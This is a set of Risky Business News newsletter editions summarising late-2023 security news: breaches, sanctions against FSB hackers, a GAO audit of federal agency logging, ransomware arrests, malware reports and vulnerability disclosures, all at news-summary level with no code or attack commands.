New tool—SSH3: Belgian PhD student François Michel has open-sourced SSH3, a version of the SSH protocol that uses HTTP/3, QUIC, and TLS 1.3.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about recent hints that the Ukrainian government has figured out how to make use of the IT Army.
You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed.
The RiskyBiz crew behind our newsletters and podcasts is on hiatus between December 8 and January 8 for the winter holidays, but we put out this weekly edition with some of the past week's biggest infosec stories.
Happy holidays!
Breaches, hacks, and security incidents
Kyivstar cyberattack: Kyivstar, Ukraine's largest mobile operator, was hit by a powerful cyberattack that disrupted services to most of its customers this week. No ETA has been provided for services coming back online. Suspicions are, obviously, on Russia. [Additional coverage in Reuters/non-paywall/Grugq commentary]
UAE TV defacements: Hackers have hijacked set-top boxes across the UAE to broadcast graphic content from the ongoing Hamas-Israel war. Known affected devices include the HK1 RBOXX. [Additional coverage in Mashable]
Insomniac hack: Sony has confirmed that hackers breached Insomniac Games, the developer of the Spider-Man 2 video game. The attack has been claimed by the Rhysida gang, which claims to have acquired screenshots and character art for the studio's upcoming Wolverine video game. [Additional coverage in Kotaku]
General tech and privacy
TikTok in Taiwan: A French documentary examined how TikTok has been used to influence young voters away from the country's independence and to closer relations and possible annexation to China. [Additional coverage in TaiwanNews]
VMware licensing update: Broadcom is killing off VMware on-premises perpetual licenses and forcing existing customers to a subscription-based model by ending the sale of support licenses. [Additional coverage in The Stack]
WhatsApp expiring voice messages: WhatsApp has added support for one-time expiring voice messages. The app has had support for a similar feature for text and video messages since 2021.
Meta sues the FTC: Social media company Meta has sued the FTC and challenged the agency's constitutionality because all US corporations believe they have more rights than actual human beings and that an agency that protects consumer rights should not exist. I'm exaggerating. Maybe. [Additional coverage in The Record]
"Strap on your seat belt," said Vladeck, who is now faculty director at Georgetown Law School’s Center on Privacy and Technology. Meta has "made a strong argument that the agency's ability to litigate cases administratively within the confines of the FTC violates the Constitution."
Discord adds security keys: Discord has added support for security keys and passkeys.
Government, politics, and policy
AI Act: EU authorities have agreed on a first version of the AI Act, a law meant to regulate artificial intelligence development and tools across the EU.
UK sanctions Asian scammers: The UK government has sanctioned nine individuals and five entities for their involvement in trafficking people in Cambodia, Laos, and Myanmar and forcing victims to work in call centers specialized in cyber fraud (also known as "pig butchering scams"). These are the first-ever sanctions levied against online scam operations.
FBI SEC reporting rules: The FBI has published a guide on how companies that suffered a security breach should report their incidents to the SEC and other authorities. The guide comes after a ransomware gang tried to use the confusion around these new rules to put pressure on a victim as part of their ransom negotiations.
US SBOM guidance: Multiple US government agencies have released guidance on securing software supply chains. The guidance covers the use of SBOMs, the use of open-source software, and the proper ways of using and maintaining open-source repositories.
Harry Coker confirmation: The US Senate has confirmed Harry Coker as the new head of the White House National Cyber Director. [Additional coverage in Politico]
AFP's call to ransomware victims: The Australian Federal Police has called on victims to report their ransomware attacks "as soon as possible."
Iran-Russia cyber treaty: Iran and Russia have signed a cybersecurity cooperation treaty. [Additional coverage in Iran International]
Ukraine takes credit for FNS hack: Ukraine's Defence Intelligence Main Directorate (GUR) says it hacked Russia's Federal Taxation Service (FNS) and wiped more than 2,300 of the agency's databases. GUR says Russian officials have been trying to restore the systems for the past four days. This is the second time the GUR officially took credit for a hack of a Russian agency after it also hacked Russian civil aviation agency Rosaviatsiya.
Risky Business Podcasts
In this podcast, Patrick Grey and Tom Uren talk about whether election interference will take place in the Taiwanese, US, and Russian elections that are all taking place in 2024. They also look at a ChatGPT-powered online harassment campaign.
Cybercrime and threat intel
Kelvin Security arrest: Spanish police have arrested the leader of the Kelvin Security hacking group. The group and its members were known for exploiting vulnerabilities and selling access to the hacked systems.
Hive gang member arrested: A Russian national suspected of being a member of the Hive ransomware group was detained in Paris this week. His home in Cyprus was also raided following the arrest. The suspect allegedly helped the gang launder its ransoms. [Additional coverage in LeFigaro/non-paywall]
Platypus case: French prosecutors are appealing a French court's case to release two suspects for hacking the Platypus cryptocurrency exchange. [Additional coverage in ZDNet France]
BOFH sentenced: A US judge sentenced a former cloud engineer to two years in prison for hacking and damaging his former employer's cloud network, a US bank.
KillMilk retires: KillMilk, the leader of the KillNet hacktivist group, has announced his retirement and appointed a new head honcho, an individual known as Deanon Club. KillMilk retired days after a Russian newspaper published his real-world identity as a 30-year-old Russian national named Nikolai Serafimov. [Additional coverage in The Record]
Amazon sues REKK group: Amazon has filed a lawsuit against REKK, a criminal group specializing in refund fraud. [Additional coverage in The Verge]
No AlphV takedown confirmation: There's been no official confirmation that law enforcement seized the server infrastructure of the AlphV ransomware gang. In the meantime, some AlphV servers started coming back online, but without their content. AlphV admins claim they just lost the hard drives.
TA4557/FIN6: Proofpoint says that since October, a threat actor known as TA4557 (links to FIN6) has been targeting job recruiters posing as possible candidates.
UTG-Q-003: Chinese security firm QiAnXin has published a report on UTG-Q-003, a threat actor the company says has uploaded a malicious app on the official Microsoft Windows Store that tried to pass as a Russian language version of the 7Zip file-archiving app. The final payload was the Lumma infostealer. The app was live in the store since mid-March and downloads spiked in August.
Scattered Spider: SilentPush researchers have published new TTPs used by Scattered Spider, the group behind recent hacks at Okta, Twilio, and MGM.
FTC QR code alert: The FTC has published a consumer threat alert, warning Americans that scammers are now using QR codes as part of their operations, redirecting users to malicious sites.
Europol security advisory:Europol says criminal gangs are increasingly using Bluetooth tracking devices for geolocalization, either victims or illegal materials.
Scam centers expand to LATAM: Interpol says that the trend of cyber fraud scam centers using kidnapped and human-trafficked operators is expanding from Southeast Asia to Latin America.
IP cloaking technique: SANS ISC is seeing threat actors map IPv4 addresses to IPv6 as a way to cloak their attacks and evade detection.
Log4j stats: Two years after security researchers discovered the Log4Shell vulnerability, roughly 38% of applications still use a vulnerable version of the Apache Log4j library.
PyPI malware: ESET has discovered 116 malicious packages uploaded to PyPI. Most of the libraries contained a version of the W4SP Stealer.
npm malware: Phylum has discovered a cluster of npm packages containing encrypted code that (when decrypted) tried to exfiltrate local user credentials to a Microsoft Teams account. The packages targeted a "major financial institution."
NCC yearly report: NCC Group has published its year-in-review research report.
Cloudflare yearly report: Cloudflare has published its year-in-review report. The most interesting tidbit is that 1.7% of TLS 1.3 traffic is now using post-quantum encryption.
OAuth app attacks: Microsoft has put out a report reviewing recent attacks that have used OAuth apps for escalating intrusions.
Malware technical reports
Kinsing: Sekoia has observed the Kinsing crypto-mining botnet exploit a recent Apache ActiveMQ zero-day tracked as CVE-2023-46604.
ATMZOW: GoDaddy's Sucuri has seen new domains deployed by the ATMZOW card skimming gang.
Rhysida ransomware: ShadowStackRE has published an analysis of Rhysida, the ransomware gang behind the recent breach at Insomniac Games, the maker of the Spider-Man games.
AsyncRAT: Trend Micro has published a report looking at AsyncRAT's new code injection technique.
"The strategic use of multiple obfuscated scripts that incorporate "living off the land" techniques grant malicious actors flexibility, enabling them to evade detection. Coupled with code injection into legitimate files like aspnet_compiler.exe, this technique significantly increases the challenge of detecting these threats."
DarkGate: Zscaler researchers look at the DarkGate malware, which saw a spike in September and October this year. Similar reports are also available from PulseDive, Sekoia, and Trellix.
GuLoader: Elastic's security team has looked at recent versions of GuLoader, an old MaaS.
MrAnon Stealer: Fortinet looks at MrAnon Stealer, a new stealer advertised via Telegram.
Sponsor Section
In this product demo, Senior Sales Engineer Ali Cheikh demonstrates the runZero platform to Risky Business host Patrick Gray.
APTs, cyber-espionage, and info-ops
Chinese hacking in the US: A Washington Post article [non-paywall] claims that Chinese military hackers have ramped up efforts to breach and backdoor critical infrastructure in the US. Sources claim the goal is to prepare ways to disrupt US operations in the case of a war in Taiwan and the Pacific. Victims include a water utility in Hawaii, a West Coast port, and at least one oil and gas pipeline operator.
PlugX: Cisco's Splunk has published a report on PlugX, a malware strain used by almost all Chinese APTs (and their dogs).
Sandman APT: In a joint report between SentinelOne, PWC, and Microsft, the three companies link the Sandman APT, which it discovered back in September, to a cluster of suspected Chinese activity.
Mustang Panda: Lab52 looks at a recent Mustang Panda campaign employing the PlugX malware.
Lazarus adopts D: According to a Cisco Talos report, North Korean group Lazarus has been using a piece of novel malware written in the D programming language.
Kimsuky: AhnLab has published a report on new Kimsuky campaigns delivering the Amadey and RftRAT malware.
ITG05/APT28: IBM X-Force looks at an ITG05/APT28 operation leveraging the Israel-Hamas war to deliver its custom-made Headlace backdoor.
Indian info-op: A Washington Post investigation [non-paywall] has exposed that a social media research organization named Disinfo Lab (not to be confused with the real EU Disinfo Lab) is secretly an Indian intelligence operation meant to discredit Narendra Modi's critics. The organization has been active since 2020 and mixing facts with claims that Indian government critics are part of a conspiracy led by global Islamic groups and billionaire George Soros to undermine India.
Vulnerabilities, security research, and bug bounty
Struts RCE: Of all these PT bugs, one of the worst is the new Struts RCE. See these twobreakdowns for more information.
pfSense vulnerabilities: SonarSource has discovered three vulnerabilities (two XSS, one command injection) in pfSense, an open-source firewall solution.
Silverpeas vulnerabilities: Rhino Security has discovered eight vulnerabilities in the Silverpeas Core open-source project business and team collaboration project.
CS2 bug: A bug is being exploited in the wild to deface CounterStrike 2 games and obtain users' IP addresses.
WP shortcode vulnerability: Wordfence has found more than 100 WordPress plugins on the official WP repository that are vulnerable to XSS attacks via their shortcode functionality. More than 6 million WordPress sites are believed to be affected.
Timing side-channel attack: Mozilla has patched a timing side-channel attack in the Firefox NSS codebase. Details about the attack will be published in January.
5Ghoul attack: A team of academics has discovered 14 vulnerabilities in 5G modems from Qualcomm and MediaTek. Referred to as 5Ghoul, the vulnerabilities impact more than 710 modern smartphone models.
Infosec industry
New tool—Swagger Jacker: Security firm BishopFix has open-sourced a new tool named Swagger Jacker for auditing OpenAPI definition files.
"This enables offensive security professionals to identify potential vulnerabilities or misconfigurations in the API routes defined within the definition document."
New tool—ScubaGoggles: CISA has open-sourced a new tool named ScubaGoggles, a baseline assessment tool for Google Workspace environments.
PHDays recap: Margin Research has published a recap of PHDays 2023, Russia's largest cybersecurity conference, and how the cybersecurity market has changed two years into Russia's invasion of Ukraine.
Trend Micro move: Trend Micro has closed down its Chinese R&D division and plans to open a new center in Canada. [Additional coverage in Radio Free Asia]
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about recent hints that the Ukrainian government has figured out how to make use of the IT Army.
You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
The Risky Biz News newsletter and podcast will be going on hiatus between December 8 and January 8 for our yearly winter holiday.
The UK government has summoned Russia's ambassador to explain a years-long hacking campaign conducted by one of the FSB's cyber units.
Officials say that FSB hackers targeted politicians and government organizations and attempted to use hacked data to influence and interfere in UK politics.
The UK government statement connects—for the first time—an APT group known as Star Blizzard to Center 18, a cybersecurity division inside Russia's FSB intelligence agency.
Also known in infosec nomenclature as Callisto, ColdRiver, Seaborgium, TA446, TAG-53, Gossamer Bear, Iron Frontier, and BlueCharlie, the group has been active since at least 2015.
Officials say Star Blizzard hacked Parliament members from multiple UK political parties, a UK think tank that studies disinformation, and journalists, NGOs, universities, and members of the UK civil society that have played crucial roles in maintaining the UK's democracy.
In addition, the UK says the same hackers also stole secret US-UK trade documents and then attempted to use passages from those documents to sway the UK 2019 General Election in a campaign known as Secondary Infektion.
In a joint technical report [PDF] published with its Five Eyes partners, the UK's cybersecurity agency (NCSC) says the group has recently pivoted to target organizations in other NATO countries and Russia's neighbors.
UK and US authorities also imposed sanctions on two members of the Star Blizzard group, one of whom is an FSB officer. The US has also charged the two for attacks on its government systems and is offering a $10 million reward for information leading to their arrest.
Ruslan Aleksandrovich PERETYATKO, who is a Russian FSB intelligence officer and a member of Star Blizzard, aka the Callisto Group
Andrey Stanislavovich KORINETS, aka Alexey DOGUZHIEV, who is a member of Star Blizzard, aka the Callisto Group
This marks the UK government's second action this year against FSB hacking operations. In May, together with its Five Eyes partners, the UK exposed and took down the Snake malware botnet, operated by the FSB's Center 16.
It also marks the second time the US has charged members of the FSB Center 18. In 2017, the US charged another FSB Center 18 officer for his role in hacking Yahoo in 2014.
Breaches, hacks, and security incidents
Nissan breach: Japanese carmaker Nissan has confirmed that hackers breached its financial unit at its Oceania division. The company says it is working to restore affected systems and investigating if user data was accessed. The Nissan Oceania outage is currently impacting other car vendors in Australia that were using the company's financial and loaning services, such as Renault, Mitsubishi, Infiniti, and Ram Trucks.
Austal ransomware incident: Australian shipbuilder and defense contractor Austral has fallen victim to a ransomware attack. [Additional coverage in Maritime Executive]
23AndMe breach data: DNA and genetic testing service 23andMe has rolled out an update to its Terms of Service that blocks users from suing the company and forces them into a binding arbitration agreement. The company took this step days after it changed the size of a data breach that took place in October. 23AndMe initially said that hackers stole data on only 1% of the company's users. The company later changed the tally to 6.9 million users, representing almost half of the company's 14 million userbase. [Additional coverage in StackDiary]
General tech and privacy
Push notification surveillance: Law enforcement agencies from the US and abroad have found a new way to track and identify users by requesting mobile push notification metadata from Apple and Google. The technique can reveal a huge amount of information because all mobile push notifications are relayed through Apple and Google servers. According to the Washington Post, the new investigative technique has been used in the US to collect information on January 6 Capital rioters. According to Reuters, the technique has also been used in democracies allied to the United States.
VPN users explode in Russia: The number of VPN users in Russia exploded by 37% this year after authorities increased their internet censorship crackdown. The number of Russian VPN users is estimated to be 11 million users, according to a study of anonymized Internet traffic. The number is 2.5 times higher than in 2021, before Russia's invasion of Ukraine. [Additional coverage in Forbes Russia]
US govt close to dropping Firefox: Because Firefox blocks Google Analytics code, someone at the US government tech department is about to drop support for the Firefox browser from US government websites because they think the browser is not being used by site visitors.
Former security exec sues Twitter: Twitter's former head of information security has sued the company in a New Jersey court for wrongful termination. Alan Rosa claims he was fired after objecting to budget cuts in the aftermath of Elon Musk's takeover. The former exec says he was also asked to shut down software that allowed Twitter to share data with law enforcement. [Additional coverage in Reuters/non-paywall]
Meta rolls out E2EE on Messenger: Meta has started enabling end-to-end encryption (E2EE) conversations for all Facebook Messenger users. The company says the roll-out phase will take a few months to complete, but it will cover all of its one billion Messenger users. Facebook Messenger has supported encrypted conversations since 2016 under a feature named Secret Conversations, but the feature was only optional. Meta says it's been working on default E2EE support since 2019, which now runs on top of its new Labyrinth encrypted storage protocol.
Apple calls for E2EE encryption: Apple Head of Security Engineering and Architecture (SEAR) Ivan Krstić is calling on tech companies to support E2EE encryption as a main defense against data breaches.
YouTube tracking identifier: Something we missed a few months back is that YouTube share links now have a new "SI" tracking identifier appended at the end that you may want to delete when sharing YouTube video links with friends.
Windows 12 release date: According to a report from Taiwanese media citing local laptop and hardware manufacturers Acer and Quanta, Windows 12 is expected to be released in June 2024.
Chrome 120: Google has released version 120 of its Chrome browser. See here for security patches and webdev-related changes. The biggest changes include the first stage of deprecating third-party cookies, a password-sharing feature, a revamped look for the new tab page, a new Safety Check feature, a feature to auto-organize tabs, and deprecating support for Android 7. In the EU, Chrome is now also prompting users to choose their default search engine.
Government, politics, and policy
DOD contractor recommendations: The DOD IG has published a document with 24 recommendations for addressing cybersecurity vulnerabilities among DoD contractors.
CISA SbD alert: CISA has published its second Secure by Design alert, with this one urging software developers to transition to memory-safe programming languages.
CyberCommand has to wait for new lead: Republican Sen. Tommy Tuberville has partially ended his hold on US military promotions, but the NSA and CyberCommand still have to wait for a new lead. The US Senate has approved 425 promotions, but Tuberville is still blocking nominations for positions of General four stars and higher. [Additional coverage in CBS]
EU-US cooperation: ENISA and CISA have signed a new cooperation treaty.
Canada's election cyber guidance: Canada's cybersecurity agency has published a series of cybersecurity guides related to its upcoming election cycle. The guides target voters, campaigns, and government officials. The agency warns of online influence operations.
Risky Business Podcasts
In this podcast, Patrick Grey and Tom Uren talk about how threat actors abusing legitimate tools (aka living off the land or LOLbins) is the new normal. Everyone is doing it, from activists to cybercriminals to nation-states. It's a worry because the defender's standard practices really aren't set up to detect and deal with that kind of behavior.
Cybercrime and threat intel
Bitzlate CEO pleads guilty: The CEO of the Bitzlato cryptocurrency exchange has pleaded guilty to money laundering-related charges. Russian national Anatoly Legkodymov was arrested earlier this year together with four of the company's executives. European and US authorities say Bitzlato helped criminal cartels and ransomware gangs launder more than $700 million worth of crypto. Officials say almost half of Bitzlato transactions were linked to criminal activity after the site's leadership failed to implement anti-money laundering controls.
CyberAv3ngers attacks: SecurityScorecard has identified six IP addresses used by Iranian group CyberAv3ngers to scan the internet for unsecured Unitronics PLCs.
DDoS booters: Searchlight Cyber looks at four of the most popular DDoS booters on the market—Nightmare Stresser, Stressthem, Paper Stresser, and Krypton Networks.
Rappler DDoS attacks: An investigation by the Qurium Media Foundation has found that the infrastructure of two proxy providers named FineProxy and RayoByte has been used in a massive DDoS attack targeting Rappler, Indonesia's leading independent news agency. The two proxy providers are operated out of Russia and the US, respectively. Qurium says that when they contacted the two companies, they offered to block outgoing DDoS traffic to Rappler rather than suspend their abusive customers. Researchers are now urging law enforcement authorities to look into the two providers.
"As a way to 'mitigate the problem' both Rayobyte and Fineproxy have asked Qurium to provide a list of our hosted organizations so they can ensure that they will not become victims of DDoS again in the future. Clever isn’t it?, if Qurium’s clients are no longer victims, there will be no more forensics reports revealing their malicious practices!"
"FineProxy even went one step further to silence Qurium. In an email exchange with Ilya Trusov CEO of FineProxy in late October 2023, we were offered to reveal the name of the customer that was responsible for the DDOS attacks. The condition to receive the customer’s information was to remove all articles about their proxy service from Qurium’s website."
"The investigation further reveals the actors behind the Russian proxy provider 'Fineproxy' and how they have managed to obtain hundreds of thousands of IP addresses from regional registrars like RIPE and ARIN and faked geo-location data to make their proxy service more valuable."
DoS classification scheme: ENISA has published a report on the DoS threat landscape, including a DoS classification scheme.
Year in Review: Cisco Talos has published its year-in-review report for 2023. As the company puts it in the introduction, "ransomware, commodity loaders and APTs dominated the threat landscape in 2023." The report has three Microsoft bugs as the top exploited CVEs of the year, per Cisco telemetry.
Malware technical reports
Krasue: Security firm Group-IB has discovered a new Linux malware strain that has been secretly infecting systems since at least 2021. Named Krasue, the malware is primarily used to serve as initial access for other cybercrime operations. Group-IB says the botnet appears to have been created by the author of the infamous XorDDoS malware or at least by someone who had access to its original source code. In addition, Krasue stands out for its use of the RTSP protocol for command-and-control channels and the use of three open-source projects (Diamorphine, Suterusu, and Rooty) to create a powerful Linux rootkit. Most Krasue infections seen so far have been spotted in Thailand.
Csharp-streamer RAT: G DATA's Michael Zimmer looks at the new Csharp-streamer RAT.
Qilin ransomware: ShadowStackRE researchers have published an analysis of the ESXi encrypter used by the Qilin ransomware gang.
Sponsor Section
In this product demo, Senior Sales Engineer Ali Cheikh demonstrates the runZero platform to Risky Business host Patrick Gray.
APTs, cyber-espionage, and info-ops
Lazarus Telegram campaign: North Korean hacking group Lazarus is conducting a large-scale Telegram phishing operation targeting the members of the cryptocurrency industry. The campaign started in early 2022 and is still ongoing, according to blockchain security firm SlowMist. Lazarus operators pose as cryptocurrency investors and typically target DeFi projects. The goal of most campaigns is to lure victims on phishing sites, collect their credentials, and then hack their projects.
UAC-0050: CERT-Ukraine has published an advisory warning of phishing campaigns conducted by Russian group UAC-0050 targeting Ukraine and Poland with the Remcos RAT and the MeduzaStealer.
APT28: PAN's Unit42 looks at APT28 campaigns targeting an Outlook vulnerability tracked as CVE-2023-23397. PAN says they've seen the group target 30 organizations across 14 countries over the past 20 months using this vulnerability.
Russian info-op uses celebrities: A Russian threat actor named Doppelgänger has used fake quotes attributed to various celebrities to push anti-Ukraine propaganda. The campaign took place in November and attributed quotes to celebrities like Taylor Swift, Kim Kardashian, Beyonce, Shakira, Justin Bieber, Cristiano Ronaldo, and others. The group also used AI-generated content in a separate campaign, but that one received lesser user engagement. The Doppelgänger group has been previously linked to a unit inside Russia's GRU military intelligence service. [Additional coverage in Wired/non-paywall/Microsoft report]
Teal Kurma's SnappyTCP: PwC's security team has published a report going over SnappyTCP, a Linux reverse shell used in attacks by the Teal Kurma (Sea Turtle) APT. Previous reporting linked the group to Türkiye.
Vulnerabilities, security research, and bug bounty
Mozilla VPN security audit: Mozilla has published its most recent security audit of its VPN product.
WordPress RCE: The WordPress team has released a security update to patch a rare remote code execution vulnerability in its CMS. Even if WordPress accounts for 43% of all internet websites, the vulnerability does not have a broad impact. It impacts only two very recent WordPress versions and is not exploitable in default configurations. Websites have to either use certain plugins or be in multisite mode.
Sierra:21 vulnerabilities: Forescout researchers have found 21 vulnerabilities in popular solutions used inside industrial and critical networks. The bugs impact Sierra Wireless Airlink cellular routers and TinyXML and OpenNDS, two open-source components.
Chromecast jailbreak: DirectDefense researchers have developed a three-exploit jailbreak for Chromecast devices. The jailbreak is a secure boot bypass that lets users run their own code on the device.
Syrus4 vulnerability: A team of security researchers says Digital Communications Technologies has not addressed a bug impacting its Syrus4 IoT gateway, leaving vehicle fleets open to attacks that could shut them down. The vendor has been apparently ghosting the researchers. [Additional coverage in CyberScoop]
Zyxel NAS vulnerabilities: BugProve has published details on two vulnerabilities in Zyxel NAS devices.
SonicWall vulnerability: Praetorian researchers have identified an authentication bypass and RCE in SonicWall WXA appliances. Praetorian says the vulnerabilities have a low impact in terms of real-world risk.
Atlassian security updates: Atlassian has released four security updates to patch RCE vulnerabilities across several products. They're all pretty bad, so patch ASAP.
Bluetooth vulnerability: Skysafe security researcher Marc Newlin has found a critical Bluetooth vulnerability (CVE-2023-45866) that can allow threat actors to bypass authentication, hijack Bluetooth connections, and perform keystroke injections. Newlin says attackers can instruct operating systems to install malicious apps or run malicious commands. The attack impacts Android, Linux, iOS, and macOS—and works even if Lockdown Mode is enabled on Apple devices. Only the Android team has patched the vulnerability so far. [Update on Jan 14, 2024: This has now been fixed on Apple devices.]
AutoSpill attack: Three academics from an Indian university have discovered a vulnerability in the Android autofill feature that can be used to spill secrets from password managers. Named AutoSpill, the attack is identical to similar techniques previously seen on desktops, exploiting browser auto-fill operations. Researchers say they successfully tested AutoSpill on password managers from 1Password, LastPass, Keeper, and Enpass. Researchers are also working on replicating the attack on iOS devices. [Additional coverage in TechCrunch]
Pool Party technique: SafeBreach researchers have identified eight new process injection techniques they are collectively referring to as Pool Party that can be used to bypass EDR solutions.
Infosec industry
Reuters takes down Appin article: Reuters has taken down an article about an Indian company that has provided hacking-for-hire services for more than a decade. The news agency says it took down the article to comply with a preliminary court order issued in India after Appin sued Reuters last month. Reuters says it stands by its reporting and plans to appeal the court order.
New Microsoft CISO: Microsoft has appointed Igor Tsyganskiy as its new Chief Information Security Officer, Microsoft Executive Vice President for Security Charlie Bell announced on LinkedIn. Tsyganskiy replaces Bret Arsenault, who previously served as Microsoft CISO for 14 years. Arsenault will move to a new role of Chief Security Advisor. Microsoft's executive shuffle comes months after Chinese state hackers compromised the company's internal network. [Additional coverage in SecurityWeek]
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about recent hints that the Ukrainian government has figured out how to make use of the IT Army.
You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
The Risky Biz News newsletter and podcast will be going on hiatus between December 8 and January 8 for our yearly winter holiday.
An audit of 23 of the largest US federal agencies found that most have failed to implement proper event logging and may be unprepared to respond to cybersecurity incidents, especially during the investigation and remediation phase.
Conducted by the US Government and Accountability Office, the report found that 20 of the 23 agencies did not meet a White House executive order mandating they reached a logging level of EL3 by August 2023.
GAO says that only three agencies reached the proper requirement, while 17 were still at EL0 and had not made any headway toward compliance.
The White House signed Executive Order 14028 [PDF] in May 2021 in the aftermath of Russia's attacks on SolarWinds servers and China's zero-day exploitation of Microsoft Exchange servers.
Investigations into both hacks and their impact on US government systems were seriously hindered by the lack of proper event logs, which made figuring out the original attacks a game of putting a puzzle together with pieces from multiple sources.
EO14028 mandated that US federal agencies improve their cybersecurity posture by deploying EDR (endpoint detection and response) tools across their networks, removing barriers from sharing threat intel, scanning for vulnerabilities, and improving investigation and remediation capabilities by supporting proper logging of network events.
GAO says that while the 23 agencies made serious headway toward deploying EDRs and vulnerability scanning frameworks, they have completely missed the mark on improving their logging capabilities.
The 23 agencies cited a lack of staff and technical challenges that come with proper logging. Below, we're quoting the GAO report on some of the reported technical challenges (emboldened text added by us).
"Specifically, 12 agencies stated that gaps in technology or complexities with existing technical environments (e.g., legacy systems) proved challenging in meeting the requirements.
In addition, 17 agencies cited the need for increased storage capacity to meet event logging requirements. For example, to meet event logging levels, some agencies may need to increase storage capacity for logs. This may be due to a need to capture more granular level details or to capture data on events that were not previously required or captured. One agency official stated that his agency currently collects over 7 terabytes of log data per day with a retention of 1 year. The official stated that in order to be compliant with current logging data requirements, the agency would need to expand logging to 70 terabytes per day. Another agency official stated that his agency already collects over 13 billion logs daily, accounting for almost 15 terabytes of data per day."
In addition, the GAO report also covers the woes some federal agencies have gone through when it came to improved intelligence sharing.
Agencies reported that many feeds either contained old information, overlapped with each other, or included classified information that they couldn't use in some of their unclassified networks.
The GAO report concludes that while federal agencies are now in a better position to spot attacks, the lack of proper logging is still limiting their incident response and investigation capabilities—which, not coincidentally, was also the reason why some US government agencies didn't spot when they got hacked by Chinese hackers earlier this year during the "Storm-0558" hacks. Those compromises, which abused Microsoft infrastructure, eventually led Microsoft to provide more free logs to their cloud customers, showing the importance of logs in modern-day hyper-connected networks.
The 23 US federal agencies audited by GAO are listed below.
Breaches, hacks, and security incidents
Andariel hacks: The South Korean government says that North Korean hacking group Andariel has breached and stolen sensitive information from some of its defense firms. Officials believe the hackers successfully stole information on the country's laser-based air defense weapons. South Korean police say the intrusions were part of a larger campaign that also hit local universities, research centers, and financial institutions. The group successfully compromised 14 organizations and also engaged in ransomware attacks. Officials say they seized and recovered $360,000 Andariel operators collected through ransoms. [Additional coverage in Yonhap News and Boa News/English coverage in Korea Times]
UK denies nuclear site hack: The UK government has denied a report that Chinese and Russian hackers breached the Sellafield nuclear site. Government officials say they rebutted the rumors before publication, but the Guardian published its report regardless.
PALIG joins MOVEit list: Pan-American Life Insurance Group (PALIG) has joined the list of companies impacted by the MOVEit attacks. More than 2,600 companies across the world have been impacted by the MOVEit hacks, and the data of 77 million users was stolen in the intrusions.
RailYatri hack: The data of more than 23 million users of the RailYatri travel agency has been leaked online and indexed by HIBP. The Indian state-owned company was hacked in December 2022.
23AndMe breach: It appears that 23AndMe's legal team likes to play with their words. After downplaying their security breach and claiming that hackers accessed the data of 0.1% of its users, it turns out hackers accessed data on 6.9 million, representing almost half of the site's estimated 14 million total users. [Additional coverage in TechCrunch]
Tipalti ransomware attack: Payments software vendor Tipalti has confirmed it got hit by a ransomware attack after the AlphV group listed the company on its dark web leak site. The incident is unique because AlphV showed its intention to use the Tipalti data to extort some of its customers. The gang hinted at possible extortions of Roblox and Twitch, two of Tipalti's largest customers. [Additional coverage in The Record]
General tech and privacy
Windows 10 ESU: Microsoft will offer three years of paid security updates for Windows 10 users after the operating system reaches its official end-of-support (EOS) date on October 14, 2025. Known as ESU (Extended Security Updates), this is the same type of paid extended support that Microsoft previously made available for Windows 7 users. This is Microsoft's third major ESU program after it announced a similar paid support scheme for Windows Server 2012/R2 users last month.
Zuckerberg buys Harvard's silence: Harvard University muzzled and then gutted a team of academics studying Facebook disinformation campaigns after Meta CEO Mark Zuckerberg donated $500 million to the university. The team was working on the Facebook Files, a collection of internal Meta documents leaked by whistleblower Frances Haugen.
Wikipedia toxicity: An academic paper has found that the rising number of toxic comments posted on Wikipedia is tied to the site's losing some of its volunteers.
Elcomsoft-MKO lawsuit: Thomas Brewster looks at the lawsuit between Elcomsoft and MKO-Systems, two Russian companies specializing in iOS digital forensics services. The lawsuit hints at a possible iOS 16 zero-day used by Elcomsoft products, which Elcomsoft claims has been stolen by MKO. [Additional coverage in Forbes/non-paywall]
Government, politics, and policy
Pegasus case in Mexico: Mexico's former president, Enrique Peña Nieto, has allegedly ordered a spying operation against the country's two largest business figures, investor Carlos Slim and mining mogul Germán Larrea. The spying operation involved the NSO Group's Pegasus spyware, according to the testimony of a whistleblower in a trial that started in Mexico this week. Prosecutors believe the spyware was used to spy on thousands of victims across the private sector and government administrations. [Additional coverage in Expreso/ English coverage in ElPais]
"The information provided by Zeus [the whistleblower] indicated that the espionage campaign had been carried out by a subsidiary of one of the suppliers of Pegasus in Mexico, the KBH business group."
Project PowerUp: Cisco Talos explains how the company helped Ukrainian authorities develop new equipment that can resist Russia's GPS jamming attacks and keep the country's power grid online in the face of mounting Russian electronic warfare.
Risky Business Podcasts
In this podcast, Patrick Grey and Tom Uren talk about how threat actors abusing legitimate tools (aka living off the land or LOLbins) is the new normal. Everyone is doing it, from activists to cybercriminals to nation-states. It's a worry because the defender's standard practices really aren't set up to detect and deal with that kind of behavior.
Cybercrime and threat intel
Raccoon dev extradition case: A judge has ruled that the Dutch government can extradite a Ukrainian national to the US to face charges for developing the Raccoon infostealer. Named Mark Sokolovsky, the suspect has been fighting his extradition since October of last year. His case revolved around claims that US authorities would treat him inhumanely and violate his human rights, accusations the judge found implausible. Sokolovsky was detained in early 2022, and his sudden disappearance following his arrest led to a hilarious situation where fellow malware developers thought he died in Ukraine following Russia's invasion.
Money mule arrests: Europol, Interpol, and law enforcement agencies from 26 countries have arrested 1,103 money mules in one of the largest crackdowns against money laundering operations. Officials say they also identified almost 11,000 money mules and their recruiters. More than 2,800 banks and financial institutions helped law enforcement in tracking down money mules and their networks.
Spyro1d: A new Android RAT named Spyro1d is being sold online somewhere. There were some rumors that it already got leaked on GitHub, but I could not find it. Instead, I found this new Windows infostealer named Laze.
Iranian hacktivism: Check Point says that Iranian hacktivist groups are expanding their activity beyond Israel to target international targets in the context of the Israel-Hamas war. The four are Cyber Av3ngers, Haghjoyan, Cyber Toufan, and the YareGomnam Team.
Zarya attacks: SANS ISC researchers have spotted the Zarya pro-Kremlin hacktivist group hunting for unpatched Microsoft Sharepoint servers.
